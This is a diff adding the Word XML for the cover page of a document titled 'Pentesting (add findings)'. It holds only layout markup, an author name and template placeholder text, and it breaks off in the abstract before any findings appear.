--- a/Documentation/Pentesting (add findings).docx
+++ b/Documentation/Pentesting (add findings).docx
@@ -2,13 +2,1328 @@
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
   <w:body>
+    <w:sdt>
+      <w:sdtPr>
+        <w:id w:val="668994301"/>
+        <w:docPartObj>
+          <w:docPartGallery w:val="Cover Pages"/>
+          <w:docPartUnique/>
+        </w:docPartObj>
+      </w:sdtPr>
+      <w:sdtContent>
+        <w:p>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <mc:AlternateContent>
+              <mc:Choice Requires="wpg">
+                <w:drawing>
+                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                    <wp:simplePos x="0" y="0"/>
+                    <wp:positionH relativeFrom="page">
+                      <wp:align>center</wp:align>
+                    </wp:positionH>
+                    <mc:AlternateContent>
+                      <mc:Choice Requires="wp14">
+                        <wp:positionV relativeFrom="page">
+                          <wp14:pctPosVOffset>2300</wp14:pctPosVOffset>
+                        </wp:positionV>
+                      </mc:Choice>
+                      <mc:Fallback>
+                        <wp:positionV relativeFrom="page">
+                          <wp:posOffset>231140</wp:posOffset>
+                        </wp:positionV>
+                      </mc:Fallback>
+                    </mc:AlternateContent>
+                    <wp:extent cx="7315200" cy="1215391"/>
+                    <wp:effectExtent l="0" t="0" r="1270" b="1905"/>
+                    <wp:wrapNone/>
+                    <wp:docPr id="149" name="Group 149"/>
+                    <wp:cNvGraphicFramePr/>
+                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
+                        <wpg:wgp>
+                          <wpg:cNvGrpSpPr/>
+                          <wpg:grpSpPr>
+                            <a:xfrm>
+                              <a:off x="0" y="0"/>
+                              <a:ext cx="7315200" cy="1215391"/>
+                              <a:chOff x="0" y="-1"/>
+                              <a:chExt cx="7315200" cy="1216153"/>
+                            </a:xfrm>
+                          </wpg:grpSpPr>
+                          <wps:wsp>
+                            <wps:cNvPr id="150" name="Rectangle 51"/>
+                            <wps:cNvSpPr/>
+                            <wps:spPr>
+                              <a:xfrm>
+                                <a:off x="0" y="-1"/>
+                                <a:ext cx="7315200" cy="1130373"/>
+                              </a:xfrm>
+                              <a:custGeom>
+                                <a:avLst/>
+                                <a:gdLst>
+                                  <a:gd name="connsiteX0" fmla="*/ 0 w 7312660"/>
+                                  <a:gd name="connsiteY0" fmla="*/ 0 h 1215390"/>
+                                  <a:gd name="connsiteX1" fmla="*/ 7312660 w 7312660"/>
+                                  <a:gd name="connsiteY1" fmla="*/ 0 h 1215390"/>
+                                  <a:gd name="connsiteX2" fmla="*/ 7312660 w 7312660"/>
+                                  <a:gd name="connsiteY2" fmla="*/ 1215390 h 1215390"/>
+                                  <a:gd name="connsiteX3" fmla="*/ 0 w 7312660"/>
+                                  <a:gd name="connsiteY3" fmla="*/ 1215390 h 1215390"/>
+                                  <a:gd name="connsiteX4" fmla="*/ 0 w 7312660"/>
+                                  <a:gd name="connsiteY4" fmla="*/ 0 h 1215390"/>
+                                  <a:gd name="connsiteX0" fmla="*/ 0 w 7312660"/>
+                                  <a:gd name="connsiteY0" fmla="*/ 0 h 1215390"/>
+                                  <a:gd name="connsiteX1" fmla="*/ 7312660 w 7312660"/>
+                                  <a:gd name="connsiteY1" fmla="*/ 0 h 1215390"/>
+                                  <a:gd name="connsiteX2" fmla="*/ 7312660 w 7312660"/>
+                                  <a:gd name="connsiteY2" fmla="*/ 1215390 h 1215390"/>
+                                  <a:gd name="connsiteX3" fmla="*/ 3667125 w 7312660"/>
+                                  <a:gd name="connsiteY3" fmla="*/ 1209675 h 1215390"/>
+                                  <a:gd name="connsiteX4" fmla="*/ 0 w 7312660"/>
+                                  <a:gd name="connsiteY4" fmla="*/ 1215390 h 1215390"/>
+                                  <a:gd name="connsiteX5" fmla="*/ 0 w 7312660"/>
+                                  <a:gd name="connsiteY5" fmla="*/ 0 h 1215390"/>
+                                  <a:gd name="connsiteX0" fmla="*/ 0 w 7312660"/>
+                                  <a:gd name="connsiteY0" fmla="*/ 0 h 1215390"/>
+                                  <a:gd name="connsiteX1" fmla="*/ 7312660 w 7312660"/>
+                                  <a:gd name="connsiteY1" fmla="*/ 0 h 1215390"/>
+                                  <a:gd name="connsiteX2" fmla="*/ 7312660 w 7312660"/>
+                                  <a:gd name="connsiteY2" fmla="*/ 1215390 h 1215390"/>
+                                  <a:gd name="connsiteX3" fmla="*/ 3619500 w 7312660"/>
+                                  <a:gd name="connsiteY3" fmla="*/ 733425 h 1215390"/>
+                                  <a:gd name="connsiteX4" fmla="*/ 0 w 7312660"/>
+                                  <a:gd name="connsiteY4" fmla="*/ 1215390 h 1215390"/>
+                                  <a:gd name="connsiteX5" fmla="*/ 0 w 7312660"/>
+                                  <a:gd name="connsiteY5" fmla="*/ 0 h 1215390"/>
+                                  <a:gd name="connsiteX0" fmla="*/ 0 w 7312660"/>
+                                  <a:gd name="connsiteY0" fmla="*/ 0 h 1215390"/>
+                                  <a:gd name="connsiteX1" fmla="*/ 7312660 w 7312660"/>
+                                  <a:gd name="connsiteY1" fmla="*/ 0 h 1215390"/>
+                                  <a:gd name="connsiteX2" fmla="*/ 7312660 w 7312660"/>
+                                  <a:gd name="connsiteY2" fmla="*/ 1129665 h 1215390"/>
+                                  <a:gd name="connsiteX3" fmla="*/ 3619500 w 7312660"/>
+                                  <a:gd name="connsiteY3" fmla="*/ 733425 h 1215390"/>
+                                  <a:gd name="connsiteX4" fmla="*/ 0 w 7312660"/>
+                                  <a:gd name="connsiteY4" fmla="*/ 1215390 h 1215390"/>
+                                  <a:gd name="connsiteX5" fmla="*/ 0 w 7312660"/>
+                                  <a:gd name="connsiteY5" fmla="*/ 0 h 1215390"/>
+                                  <a:gd name="connsiteX0" fmla="*/ 9525 w 7322185"/>
+                                  <a:gd name="connsiteY0" fmla="*/ 0 h 1129665"/>
+                                  <a:gd name="connsiteX1" fmla="*/ 7322185 w 7322185"/>
+                                  <a:gd name="connsiteY1" fmla="*/ 0 h 1129665"/>
+                                  <a:gd name="connsiteX2" fmla="*/ 7322185 w 7322185"/>
+                                  <a:gd name="connsiteY2" fmla="*/ 1129665 h 1129665"/>
+                                  <a:gd name="connsiteX3" fmla="*/ 3629025 w 7322185"/>
+                                  <a:gd name="connsiteY3" fmla="*/ 733425 h 1129665"/>
+                                  <a:gd name="connsiteX4" fmla="*/ 0 w 7322185"/>
+                                  <a:gd name="connsiteY4" fmla="*/ 1091565 h 1129665"/>
+                                  <a:gd name="connsiteX5" fmla="*/ 9525 w 7322185"/>
+                                  <a:gd name="connsiteY5" fmla="*/ 0 h 1129665"/>
+                                  <a:gd name="connsiteX0" fmla="*/ 0 w 7312660"/>
+                                  <a:gd name="connsiteY0" fmla="*/ 0 h 1129665"/>
+                                  <a:gd name="connsiteX1" fmla="*/ 7312660 w 7312660"/>
+                                  <a:gd name="connsiteY1" fmla="*/ 0 h 1129665"/>
+                                  <a:gd name="connsiteX2" fmla="*/ 7312660 w 7312660"/>
+                                  <a:gd name="connsiteY2" fmla="*/ 1129665 h 1129665"/>
+                                  <a:gd name="connsiteX3" fmla="*/ 3619500 w 7312660"/>
+                                  <a:gd name="connsiteY3" fmla="*/ 733425 h 1129665"/>
+                                  <a:gd name="connsiteX4" fmla="*/ 0 w 7312660"/>
+                                  <a:gd name="connsiteY4" fmla="*/ 1091565 h 1129665"/>
+                                  <a:gd name="connsiteX5" fmla="*/ 0 w 7312660"/>
+                                  <a:gd name="connsiteY5" fmla="*/ 0 h 1129665"/>
+                                </a:gdLst>
+                                <a:ahLst/>
+                                <a:cxnLst>
+                                  <a:cxn ang="0">
+                                    <a:pos x="connsiteX0" y="connsiteY0"/>
+                                  </a:cxn>
+                                  <a:cxn ang="0">
+                                    <a:pos x="connsiteX1" y="connsiteY1"/>
+                                  </a:cxn>
+                                  <a:cxn ang="0">
+                                    <a:pos x="connsiteX2" y="connsiteY2"/>
+                                  </a:cxn>
+                                  <a:cxn ang="0">
+                                    <a:pos x="connsiteX3" y="connsiteY3"/>
+                                  </a:cxn>
+                                  <a:cxn ang="0">
+                                    <a:pos x="connsiteX4" y="connsiteY4"/>
+                                  </a:cxn>
+                                  <a:cxn ang="0">
+                                    <a:pos x="connsiteX5" y="connsiteY5"/>
+                                  </a:cxn>
+                                </a:cxnLst>
+                                <a:rect l="l" t="t" r="r" b="b"/>
+                                <a:pathLst>
+                                  <a:path w="7312660" h="1129665">
+                                    <a:moveTo>
+                                      <a:pt x="0" y="0"/>
+                                    </a:moveTo>
+                                    <a:lnTo>
+                                      <a:pt x="7312660" y="0"/>
+                                    </a:lnTo>
+                                    <a:lnTo>
+                                      <a:pt x="7312660" y="1129665"/>
+                                    </a:lnTo>
+                                    <a:lnTo>
+                                      <a:pt x="3619500" y="733425"/>
+                                    </a:lnTo>
+                                    <a:lnTo>
+                                      <a:pt x="0" y="1091565"/>
+                                    </a:lnTo>
+                                    <a:lnTo>
+                                      <a:pt x="0" y="0"/>
+                                    </a:lnTo>
+                                    <a:close/>
+                                  </a:path>
+                                </a:pathLst>
+                              </a:custGeom>
+                              <a:ln>
+                                <a:noFill/>
+                              </a:ln>
+                            </wps:spPr>
+                            <wps:style>
+                              <a:lnRef idx="2">
+                                <a:schemeClr val="accent1">
+                                  <a:shade val="50000"/>
+                                </a:schemeClr>
+                              </a:lnRef>
+                              <a:fillRef idx="1">
+                                <a:schemeClr val="accent1"/>
+                              </a:fillRef>
+                              <a:effectRef idx="0">
+                                <a:schemeClr val="accent1"/>
+                              </a:effectRef>
+                              <a:fontRef idx="minor">
+                                <a:schemeClr val="lt1"/>
+                              </a:fontRef>
+                            </wps:style>
+                            <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                              <a:prstTxWarp prst="textNoShape">
+                                <a:avLst/>
+                              </a:prstTxWarp>
+                              <a:noAutofit/>
+                            </wps:bodyPr>
+                          </wps:wsp>
+                          <wps:wsp>
+                            <wps:cNvPr id="151" name="Rectangle 151"/>
+                            <wps:cNvSpPr/>
+                            <wps:spPr>
+                              <a:xfrm>
+                                <a:off x="0" y="0"/>
+                                <a:ext cx="7315200" cy="1216152"/>
+                              </a:xfrm>
+                              <a:prstGeom prst="rect">
+                                <a:avLst/>
+                              </a:prstGeom>
+                              <a:blipFill>
+                                <a:blip r:embed="rId6"/>
+                                <a:stretch>
+                                  <a:fillRect r="-7574"/>
+                                </a:stretch>
+                              </a:blipFill>
+                              <a:ln>
+                                <a:noFill/>
+                              </a:ln>
+                            </wps:spPr>
+                            <wps:style>
+                              <a:lnRef idx="2">
+                                <a:schemeClr val="accent1">
+                                  <a:shade val="50000"/>
+                                </a:schemeClr>
+                              </a:lnRef>
+                              <a:fillRef idx="1">
+                                <a:schemeClr val="accent1"/>
+                              </a:fillRef>
+                              <a:effectRef idx="0">
+                                <a:schemeClr val="accent1"/>
+                              </a:effectRef>
+                              <a:fontRef idx="minor">
+                                <a:schemeClr val="lt1"/>
+                              </a:fontRef>
+                            </wps:style>
+                            <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                              <a:prstTxWarp prst="textNoShape">
+                                <a:avLst/>
+                              </a:prstTxWarp>
+                              <a:noAutofit/>
+                            </wps:bodyPr>
+                          </wps:wsp>
+                        </wpg:wgp>
+                      </a:graphicData>
+                    </a:graphic>
+                    <wp14:sizeRelH relativeFrom="page">
+                      <wp14:pctWidth>94100</wp14:pctWidth>
+                    </wp14:sizeRelH>
+                    <wp14:sizeRelV relativeFrom="page">
+                      <wp14:pctHeight>12100</wp14:pctHeight>
+                    </wp14:sizeRelV>
+                  </wp:anchor>
+                </w:drawing>
+              </mc:Choice>
+              <mc:Fallback>
+                <w:pict>
+                  <v:group w14:anchorId="7361CF2C" id="Group 149" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:0;width:8in;height:95.7pt;z-index:251662336;mso-width-percent:941;mso-height-percent:121;mso-top-percent:23;mso-position-horizontal:center;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;mso-width-percent:941;mso-height-percent:121;mso-top-percent:23" coordorigin="" coordsize="73152,12161" o:gfxdata="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">
+                    <v:shape id="Rectangle 51" o:spid="_x0000_s1027" style="position:absolute;width:73152;height:11303;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" coordsize="7312660,1129665" o:gfxdata="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" path="m,l7312660,r,1129665l3619500,733425,,1091565,,xe" fillcolor="#5b9bd5 [3204]" stroked="f" strokeweight="1pt">
+                      <v:stroke joinstyle="miter"/>
+                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;7315200,0;7315200,1130373;3620757,733885;0,1092249;0,0" o:connectangles="0,0,0,0,0,0"/>
+                    </v:shape>
+                    <v:rect id="Rectangle 151" o:spid="_x0000_s1028" style="position:absolute;width:73152;height:12161;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:gfxdata="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" stroked="f" strokeweight="1pt">
+                      <v:fill r:id="rId7" o:title="" recolor="t" rotate="t" type="frame"/>
+                    </v:rect>
+                    <w10:wrap anchorx="page" anchory="page"/>
+                  </v:group>
+                </w:pict>
+              </mc:Fallback>
+            </mc:AlternateContent>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <mc:AlternateContent>
+              <mc:Choice Requires="wps">
+                <w:drawing>
+                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                    <wp:simplePos x="0" y="0"/>
+                    <wp:positionH relativeFrom="page">
+                      <wp:align>center</wp:align>
+                    </wp:positionH>
+                    <mc:AlternateContent>
+                      <mc:Choice Requires="wp14">
+                        <wp:positionV relativeFrom="page">
+                          <wp14:pctPosVOffset>81800</wp14:pctPosVOffset>
+                        </wp:positionV>
+                      </mc:Choice>
+                      <mc:Fallback>
+                        <wp:positionV relativeFrom="page">
+                          <wp:posOffset>8227695</wp:posOffset>
+                        </wp:positionV>
+                      </mc:Fallback>
+                    </mc:AlternateContent>
+                    <wp:extent cx="7315200" cy="914400"/>
+                    <wp:effectExtent l="0" t="0" r="0" b="8255"/>
+                    <wp:wrapSquare wrapText="bothSides"/>
+                    <wp:docPr id="152" name="Text Box 152"/>
+                    <wp:cNvGraphicFramePr/>
+                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                        <wps:wsp>
+                          <wps:cNvSpPr txBox="1"/>
+                          <wps:spPr>
+                            <a:xfrm>
+                              <a:off x="0" y="0"/>
+                              <a:ext cx="7315200" cy="914400"/>
+                            </a:xfrm>
+                            <a:prstGeom prst="rect">
+                              <a:avLst/>
+                            </a:prstGeom>
+                            <a:noFill/>
+                            <a:ln w="6350">
+                              <a:noFill/>
+                            </a:ln>
+                            <a:effectLst/>
+                          </wps:spPr>
+                          <wps:style>
+                            <a:lnRef idx="0">
+                              <a:schemeClr val="accent1"/>
+                            </a:lnRef>
+                            <a:fillRef idx="0">
+                              <a:schemeClr val="accent1"/>
+                            </a:fillRef>
+                            <a:effectRef idx="0">
+                              <a:schemeClr val="accent1"/>
+                            </a:effectRef>
+                            <a:fontRef idx="minor">
+                              <a:schemeClr val="dk1"/>
+                            </a:fontRef>
+                          </wps:style>
+                          <wps:txbx>
+                            <w:txbxContent>
+                              <w:sdt>
+                                <w:sdtPr>
+                                  <w:rPr>
+                                    <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                                    <w:sz w:val="28"/>
+                                    <w:szCs w:val="28"/>
+                                  </w:rPr>
+                                  <w:alias w:val="Author"/>
+                                  <w:tag w:val=""/>
+                                  <w:id w:val="789243997"/>
+                                  <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:creator[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
+                                  <w:text/>
+                                </w:sdtPr>
+                                <w:sdtContent>
+                                  <w:p>
+                                    <w:pPr>
+                                      <w:pStyle w:val="NoSpacing"/>
+                                      <w:jc w:val="right"/>
+                                      <w:rPr>
+                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                                        <w:sz w:val="28"/>
+                                        <w:szCs w:val="28"/>
+                                      </w:rPr>
+                                    </w:pPr>
+                                    <w:r>
+                                      <w:rPr>
+                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                                        <w:sz w:val="28"/>
+                                        <w:szCs w:val="28"/>
+                                      </w:rPr>
+                                      <w:t xml:space="preserve">Georgiana Manolache </w:t>
+                                    </w:r>
+                                  </w:p>
+                                </w:sdtContent>
+                              </w:sdt>
+                              <w:p>
+                                <w:pPr>
+                                  <w:pStyle w:val="NoSpacing"/>
+                                  <w:jc w:val="right"/>
+                                  <w:rPr>
+                                    <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                                    <w:sz w:val="18"/>
+                                    <w:szCs w:val="18"/>
+                                  </w:rPr>
+                                </w:pPr>
+                                <w:sdt>
+                                  <w:sdtPr>
+                                    <w:rPr>
+                                      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                                      <w:sz w:val="18"/>
+                                      <w:szCs w:val="18"/>
+                                    </w:rPr>
+                                    <w:alias w:val="Email"/>
+                                    <w:tag w:val="Email"/>
+                                    <w:id w:val="942260680"/>
+                                    <w:showingPlcHdr/>
+                                    <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:CompanyEmail[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
+                                    <w:text/>
+                                  </w:sdtPr>
+                                  <w:sdtContent>
+                                    <w:r>
+                                      <w:rPr>
+                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                                        <w:sz w:val="18"/>
+                                        <w:szCs w:val="18"/>
+                                      </w:rPr>
+                                      <w:t xml:space="preserve">     </w:t>
+                                    </w:r>
+                                  </w:sdtContent>
+                                </w:sdt>
+                              </w:p>
+                            </w:txbxContent>
+                          </wps:txbx>
+                          <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="1600200" tIns="0" rIns="685800" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="b" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                            <a:prstTxWarp prst="textNoShape">
+                              <a:avLst/>
+                            </a:prstTxWarp>
+                            <a:noAutofit/>
+                          </wps:bodyPr>
+                        </wps:wsp>
+                      </a:graphicData>
+                    </a:graphic>
+                    <wp14:sizeRelH relativeFrom="page">
+                      <wp14:pctWidth>94100</wp14:pctWidth>
+                    </wp14:sizeRelH>
+                    <wp14:sizeRelV relativeFrom="page">
+                      <wp14:pctHeight>9200</wp14:pctHeight>
+                    </wp14:sizeRelV>
+                  </wp:anchor>
+                </w:drawing>
+              </mc:Choice>
+              <mc:Fallback>
+                <w:pict>
+                  <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                    <v:stroke joinstyle="miter"/>
+                    <v:path gradientshapeok="t" o:connecttype="rect"/>
+                  </v:shapetype>
+                  <v:shape id="Text Box 152" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:0;width:8in;height:1in;z-index:251660288;visibility:visible;mso-wrap-style:square;mso-width-percent:941;mso-height-percent:92;mso-top-percent:818;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:center;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;mso-width-percent:941;mso-height-percent:92;mso-top-percent:818;mso-width-relative:page;mso-height-relative:page;v-text-anchor:bottom" o:gfxdata="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" filled="f" stroked="f" strokeweight=".5pt">
+                    <v:textbox inset="126pt,0,54pt,0">
+                      <w:txbxContent>
+                        <w:sdt>
+                          <w:sdtPr>
+                            <w:rPr>
+                              <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                              <w:sz w:val="28"/>
+                              <w:szCs w:val="28"/>
+                            </w:rPr>
+                            <w:alias w:val="Author"/>
+                            <w:tag w:val=""/>
+                            <w:id w:val="789243997"/>
+                            <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:creator[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
+                            <w:text/>
+                          </w:sdtPr>
+                          <w:sdtContent>
+                            <w:p>
+                              <w:pPr>
+                                <w:pStyle w:val="NoSpacing"/>
+                                <w:jc w:val="right"/>
+                                <w:rPr>
+                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                                  <w:sz w:val="28"/>
+                                  <w:szCs w:val="28"/>
+                                </w:rPr>
+                              </w:pPr>
+                              <w:r>
+                                <w:rPr>
+                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                                  <w:sz w:val="28"/>
+                                  <w:szCs w:val="28"/>
+                                </w:rPr>
+                                <w:t xml:space="preserve">Georgiana Manolache </w:t>
+                              </w:r>
+                            </w:p>
+                          </w:sdtContent>
+                        </w:sdt>
+                        <w:p>
+                          <w:pPr>
+                            <w:pStyle w:val="NoSpacing"/>
+                            <w:jc w:val="right"/>
+                            <w:rPr>
+                              <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                              <w:sz w:val="18"/>
+                              <w:szCs w:val="18"/>
+                            </w:rPr>
+                          </w:pPr>
+                          <w:sdt>
+                            <w:sdtPr>
+                              <w:rPr>
+                                <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:alias w:val="Email"/>
+                              <w:tag w:val="Email"/>
+                              <w:id w:val="942260680"/>
+                              <w:showingPlcHdr/>
+                              <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:CompanyEmail[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
+                              <w:text/>
+                            </w:sdtPr>
+                            <w:sdtContent>
+                              <w:r>
+                                <w:rPr>
+                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                                  <w:sz w:val="18"/>
+                                  <w:szCs w:val="18"/>
+                                </w:rPr>
+                                <w:t xml:space="preserve">     </w:t>
+                              </w:r>
+                            </w:sdtContent>
+                          </w:sdt>
+                        </w:p>
+                      </w:txbxContent>
+                    </v:textbox>
+                    <w10:wrap type="square" anchorx="page" anchory="page"/>
+                  </v:shape>
+                </w:pict>
+              </mc:Fallback>
+            </mc:AlternateContent>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <mc:AlternateContent>
+              <mc:Choice Requires="wps">
+                <w:drawing>
+                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                    <wp:simplePos x="0" y="0"/>
+                    <wp:positionH relativeFrom="page">
+                      <wp:align>center</wp:align>
+                    </wp:positionH>
+                    <mc:AlternateContent>
+                      <mc:Choice Requires="wp14">
+                        <wp:positionV relativeFrom="page">
+                          <wp14:pctPosVOffset>70000</wp14:pctPosVOffset>
+                        </wp:positionV>
+                      </mc:Choice>
+                      <mc:Fallback>
+                        <wp:positionV relativeFrom="page">
+                          <wp:posOffset>7040880</wp:posOffset>
+                        </wp:positionV>
+                      </mc:Fallback>
+                    </mc:AlternateContent>
+                    <wp:extent cx="7315200" cy="1009650"/>
+                    <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                    <wp:wrapSquare wrapText="bothSides"/>
+                    <wp:docPr id="153" name="Text Box 153"/>
+                    <wp:cNvGraphicFramePr/>
+                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                        <wps:wsp>
+                          <wps:cNvSpPr txBox="1"/>
+                          <wps:spPr>
+                            <a:xfrm>
+                              <a:off x="0" y="0"/>
+                              <a:ext cx="7315200" cy="1009650"/>
+                            </a:xfrm>
+                            <a:prstGeom prst="rect">
+                              <a:avLst/>
+                            </a:prstGeom>
+                            <a:noFill/>
+                            <a:ln w="6350">
+                              <a:noFill/>
+                            </a:ln>
+                            <a:effectLst/>
+                          </wps:spPr>
+                          <wps:style>
+                            <a:lnRef idx="0">
+                              <a:schemeClr val="accent1"/>
+                            </a:lnRef>
+                            <a:fillRef idx="0">
+                              <a:schemeClr val="accent1"/>
+                            </a:fillRef>
+                            <a:effectRef idx="0">
+                              <a:schemeClr val="accent1"/>
+                            </a:effectRef>
+                            <a:fontRef idx="minor">
+                              <a:schemeClr val="dk1"/>
+                            </a:fontRef>
+                          </wps:style>
+                          <wps:txbx>
+                            <w:txbxContent>
+                              <w:p>
+                                <w:pPr>
+                                  <w:pStyle w:val="NoSpacing"/>
+                                  <w:jc w:val="right"/>
+                                  <w:rPr>
+                                    <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+                                    <w:sz w:val="28"/>
+                                    <w:szCs w:val="28"/>
+                                  </w:rPr>
+                                </w:pPr>
+                                <w:r>
+                                  <w:rPr>
+                                    <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+                                    <w:sz w:val="28"/>
+                                    <w:szCs w:val="28"/>
+                                  </w:rPr>
+                                  <w:t>Abstract</w:t>
+                                </w:r>
+                              </w:p>
+                              <w:sdt>
+                                <w:sdtPr>
+                                  <w:rPr>
+                                    <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                                    <w:sz w:val="20"/>
+                                    <w:szCs w:val="20"/>
+                                  </w:rPr>
+                                  <w:alias w:val="Abstract"/>
+                                  <w:tag w:val=""/>
+                                  <w:id w:val="1375273687"/>
+                                  <w:showingPlcHdr/>
+                                  <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:Abstract[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
+                                  <w:text w:multiLine="1"/>
+                                </w:sdtPr>
+                                <w:sdtContent>
+                                  <w:p>
+                                    <w:pPr>
+                                      <w:pStyle w:val="NoSpacing"/>
+                                      <w:jc w:val="right"/>
+                                      <w:rPr>
+                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                                        <w:sz w:val="20"/>
+                                        <w:szCs w:val="20"/>
+                                      </w:rPr>
+                                    </w:pPr>
+                                    <w:r>
+                                      <w:rPr>
+                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                                        <w:sz w:val="20"/>
+                                        <w:szCs w:val="20"/>
+                                      </w:rPr>
+                                      <w:t xml:space="preserve">[Draw your reader in with an engaging abstract. It is typically a short summary of the document. </w:t>
+                                    </w:r>
+                                    <w:r>
+                                      <w:rPr>
+                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                                        <w:sz w:val="20"/>
+                                        <w:szCs w:val="20"/>
+                                      </w:rPr>
